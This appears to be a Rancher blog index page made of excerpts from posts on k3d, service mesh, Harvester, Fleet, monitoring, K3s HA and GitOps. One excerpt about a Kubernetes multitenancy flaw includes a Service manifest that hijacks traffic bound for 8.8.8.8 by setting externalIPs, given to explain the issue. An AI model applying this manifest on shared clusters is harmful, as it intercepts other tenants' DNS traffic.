Have you ever wanted to try K3s in high availability “mode,” but you either did not have the minimum of three spare nodes or the time required to set up that many VMs? Then you’re in for a treat: meet k3d!
If you’re not familiar with k3d, its name gives you a hint to what it’s all about: K3s in Docker. k3d is a lightweight wrapper to run K3s (a lightweight, certified Kubernetes distribution shipped as a single binary under 40MB, developed by Rancher Labs and now a CNCF sandbox project) in Docker.
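As a taste of how little setup is involved, here is a minimal sketch, assuming Docker and a recent k3d (v4 or later) are installed; the cluster name ha-demo is illustrative:

```bash
# Create an HA K3s cluster in Docker: three servers, two agents
k3d cluster create ha-demo --servers 3 --agents 2

# k3d merges the kubeconfig for you; all five nodes should report Ready
kubectl get nodes
```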
Service Mesh is an emerging architecture pattern that is gaining traction today. Together with Kubernetes, a Service Mesh can form a powerful platform that addresses the technical requirements arising in the highly distributed environments typical of microservices-based clusters and service infrastructures. A Service Mesh is a dedicated infrastructure layer for facilitating service-to-service communication between microservices.
Service Mesh addresses the communication requirements typical of a microservices-based application, including encrypted tunnels, health checks, circuit breakers, load balancing and traffic permissions.
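As a concrete illustration (using Istio as one example mesh, not the only option), many meshes work by injecting a sidecar proxy into each pod, often enabled with a single namespace label:

```bash
# With Istio, labeling a namespace opts its pods into sidecar injection;
# the injected proxy then handles mTLS, retries, load balancing and policy
kubectl label namespace demo istio-injection=enabled
```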
Earlier this month, the Kubernetes project discovered a security issue affecting multitenant clusters: if a potential attacker can already create or edit services and pods, then they may be able to intercept traffic from other pods (or nodes) in the cluster.
An attacker who is able to create a ClusterIP service and set the spec.externalIPs field can intercept traffic to that IP. For example, a malicious party would be able to intercept traffic intended for Google’s public DNS server address 8.8.8.8.
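To make the attack concrete, here is a sketch of the kind of Service involved (the names are illustrative); on unpatched clusters, kube-proxy would begin routing in-cluster traffic bound for 8.8.8.8 to the attacker’s pods:

```bash
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Service
metadata:
  name: intercept-dns
spec:
  selector:
    app: attacker        # pods the attacker controls
  ports:
  - port: 53
    protocol: UDP
    targetPort: 53
  externalIPs:
  - 8.8.8.8              # the externally owned IP being hijacked
EOF
```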
Today, I am excited to announce project Harvester, open source hyperconverged infrastructure (HCI) software built using Kubernetes. Harvester provides fully integrated virtualization and storage capabilities on bare-metal servers. No Kubernetes knowledge is required to use Harvester.
Why Harvester? In the past few years, we’ve seen many attempts to bring VM management into container platforms, including our own RancherVM, and other solutions like KubeVirt and Virtlet. We’ve seen some demand for solutions like this, mostly for running legacy software side by side with containers.
As companies adopt container technologies, they face a significant challenge: how do we secure this new attack surface? It’s an issue that often gets backlogged in favor of solving storage, networking and monitoring issues. Add the challenge of educating the workforce on one of the fastest-growing open source projects to date, and it’s no wonder security has lagged as a primary focus for teams. In fact, The New Stack published a survey showing that almost 50 percent of Kubernetes users say security is their top unresolved issue.
Are you or your team currently looking for your next-generation architecture? Or perhaps you’re already there, but looking for the best way to automate and manage it? In this blog, we’re going to talk about deploying Rancher environments using the power of env0.
Rancher: Kubernetes Management Platform
Rancher is a complete software stack for teams adopting containers. It addresses the operational and security challenges of managing multiple Kubernetes clusters while providing DevOps teams with integrated tools for running containerized workloads.
With massive adoption of Kubernetes at enterprises worldwide, we are seeing Kubernetes going to new extremes. On the one hand, Kubernetes is being adopted for workloads at the edge and delivering value beyond the data center. On the other hand, Kubernetes is being used to drive Machine Learning (ML) and high-quality, high-speed data analysis capabilities. The activity we are seeing with ML results from developments in Kubernetes starting around v1.
Cloud-native is the ultimate buzzword lately. So, is “cloud-native storage” just an attempt to grab on to this concept, hoping for a little boost? Actually, there is something more to it, and I’ll unpack that here.
The premise of cloud-native storage is simple: its native habitat is a Kubernetes cluster. When we design with the assumption that a technology will exist in Kubernetes, we get to look around and see what functionalities already exist in that system.
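For example, rather than provisioning a disk out of band and wiring it in, a workload can simply declare its needs with a PersistentVolumeClaim and let the cluster’s provisioner fulfill them. A minimal sketch (the StorageClass name longhorn is illustrative):

```bash
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: app-data
spec:
  accessModes:
  - ReadWriteOnce
  storageClassName: longhorn   # any dynamic provisioner will do
  resources:
    requests:
      storage: 5Gi
EOF
```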
In July, I announced SUSE's intent to acquire Rancher Labs, and now that the acquisition is final, today we embark on a new journey with SUSE. I couldn't be more excited about our future and what this means for our customers around the world.
Just as Rancher made computing everywhere a possibility for our customers, with SUSE, we will empower our customers to innovate everywhere. Together we will offer our customers possibilities that know no limitations from the data center to the cloud, to the edge and beyond.
Today Amazon announced Amazon EKS Distro (EKS-D), a Kubernetes distribution based on and used by Amazon EKS. Amazon EKS Distro enables you to create reliable and secure Kubernetes clusters using the same versions of Kubernetes and its dependencies deployed by Amazon EKS. Each Amazon EKS Distro release follows the EKS process, verifying new Kubernetes versions for compatibility. The Amazon EKS Distro source code, open source tooling, binaries, container images and configuration are provided via public Git and S3 storage locations, enabling reproducible builds.
What’s Cool in Rancher 2.5? A Partner Perspective from SVA
Since 2014, Rancher Labs has been making it easier for IT professionals to handle containers. Until now, every release of their flagship product, Rancher, brought features that you wouldn’t want to be without. But the latest releases have really taken things up a few notches.
In the 2.4 release, you could already see that something was about to happen. The number of manageable clusters and nodes had multiplied.
Today’s generation of makers, artists and creatives have reinforced the idea that great things can happen when you roll up your sleeves and try to learn something new and exciting. Kubernetes was like this only a couple of years ago: the mere act of installing the thing was a rewarding challenge. Kelsey Hightower’s Kubernetes the Hard Way became the Maker’s handbook for this artisan craft.
Fast forward to today and installing Kubernetes is no longer a noteworthy event.
If you’re like me and have been watching the odd purchasing trends due to the pandemic, you probably remember when all the hair clippers were sold out — and then flour and yeast. Most recently, you might have seen this headline: Tupperware profits and shares soar as more people are eating at home during the pandemic. Tupperware is finally having its day. But a Tupperware stacking strategy is probably not why you’re here.
We created the Fleet Project to provide centralized GitOps-style management of a large number of Kubernetes clusters. A key design goal of Fleet is to be able to manage 1 million geographically distributed clusters. When we architected Fleet, we wanted to use a standard Kubernetes controller architecture. This meant in order to scale, we needed to prove we could scale Kubernetes much farther than we ever had. In this blog, I will cover Fleet’s architecture, the method we used to test scale and our findings.
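For context on the GitOps model itself, the unit of management in Fleet is a GitRepo resource: it tells the Fleet manager what to pull from Git and which downstream clusters to target. A minimal sketch (the repository URL and labels are illustrative):

```bash
cat <<EOF | kubectl apply -f -
apiVersion: fleet.cattle.io/v1alpha1
kind: GitRepo
metadata:
  name: example-app
  namespace: fleet-default
spec:
  repo: https://github.com/example/fleet-examples   # illustrative repo
  paths:
  - simple
  targets:
  - clusterSelector:        # deploy to every cluster matching these labels
      matchLabels:
        env: edge
EOF
```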
We dedicate a lot of space in our blog to the topic of monitoring. That’s because when you’re managing Kubernetes clusters, things can change quickly. It’s important that you have tools to monitor the health and resource metrics of your clusters.
In Rancher 2.5, we introduced a new version of our monitoring based on the Prometheus Operator, which provides Kubernetes-native deployment and management of Prometheus and related monitoring components. The Prometheus Operator lets you monitor the state and processes of your cluster nodes, Kubernetes components and application workloads.
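In practice, pointing Prometheus at a new workload becomes a declarative act: you create a ServiceMonitor and the operator reconfigures Prometheus for you. A minimal sketch (the app label and port name are illustrative):

```bash
cat <<EOF | kubectl apply -f -
apiVersion: monitoring.coreos.com/v1
kind: ServiceMonitor
metadata:
  name: my-app
spec:
  selector:
    matchLabels:
      app: my-app        # Services carrying this label get scraped
  endpoints:
  - port: metrics        # named port on the Service
    interval: 30s
EOF
```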
Kubernetes is increasingly becoming a uniform standard for computing at the edge, in the core and in the cloud. At NTS, we recognize this trend and have been systematically building up competencies in this core technology since 2018. As a technically oriented business, we regularly validate different Kubernetes platforms, and we share the view of many analysts (e.g., Forrester and Gartner, including the Gartner Hype Cycle reports) that Rancher Labs ranks among the leading players in this sector.
Introduction
In this post, we will outline a reference architecture for setting up K3s in a High Availability (HA) configuration. This means that your K3s cluster can tolerate a failure and remain up and running and serving traffic to your users. Your applications should also be built and configured for high availability, but that is beyond the scope of this tutorial.
K3s is a lightweight certified Kubernetes distribution developed at Rancher Labs that is built for IoT and edge computing.
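To give a flavor of what the setup looks like, here is one way to bootstrap an HA control plane, assuming a K3s release with embedded etcd support (v1.19 or later); the hostnames and shared token are illustrative:

```bash
# On the first server node: initialize the embedded etcd cluster
curl -sfL https://get.k3s.io | K3S_TOKEN=SECRET sh -s - server --cluster-init

# On each additional server node: join via the first server
curl -sfL https://get.k3s.io | K3S_TOKEN=SECRET \
  sh -s - server --server https://server1.example.com:6443
```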
As Kubernetes continues to establish itself as the industry standard for container orchestration, finding effective ways to use a declarative model for your applications and tools is critical to success. In this blog, we’ll set up a K3s Kubernetes cluster in AWS, then implement secure GitOps using ArgoCD and Vault. Check out the source for the infrastructure and the Kubernetes umbrella application here.
Here are the components we’ll be using: a K3s Kubernetes cluster running in AWS, ArgoCD for GitOps delivery and Vault for secrets management.
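As a preview of the GitOps piece, ArgoCD tracks a Git repository through an Application resource; a minimal sketch follows (the repository URL and path are illustrative, not the linked source):

```bash
cat <<EOF | kubectl apply -f -
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: umbrella
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/example/k8s-umbrella   # illustrative repo
    targetRevision: HEAD
    path: charts/umbrella
  destination:
    server: https://kubernetes.default.svc
    namespace: default
  syncPolicy:
    automated:          # keep cluster state converged with Git
      prune: true
      selfHeal: true
EOF
```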
Rancher Labs has launched its much-anticipated Rancher version 2.5 into the cloud-native space, and we at LSD couldn't be more excited. Before highlighting some of the new features, here is some context as to how we think Rancher is innovating.
Kubernetes has become one of the most important technologies adopted by companies in their quest to modernize. While the container orchestrator, a fundamental piece of the cloud-native journey, has many advantages, it can also be frustratingly complex and challenging to architect, build, manage and maintain.
As a Senior Solutions Engineer helping customers deploy cloud-native technologies, I have been using Docker and Rancher for more than five years. Heck, I even helped steer Rancher for offline use when it was the 0.19 release. I have loved the product and company for YEARS.
We all know how complicated it is to set up Kubernetes, and customers love Rancher because it simplifies that rollout. But once you get the cluster running, a more significant challenge awaits: how do you ensure your Kubernetes applications are up to date and secure?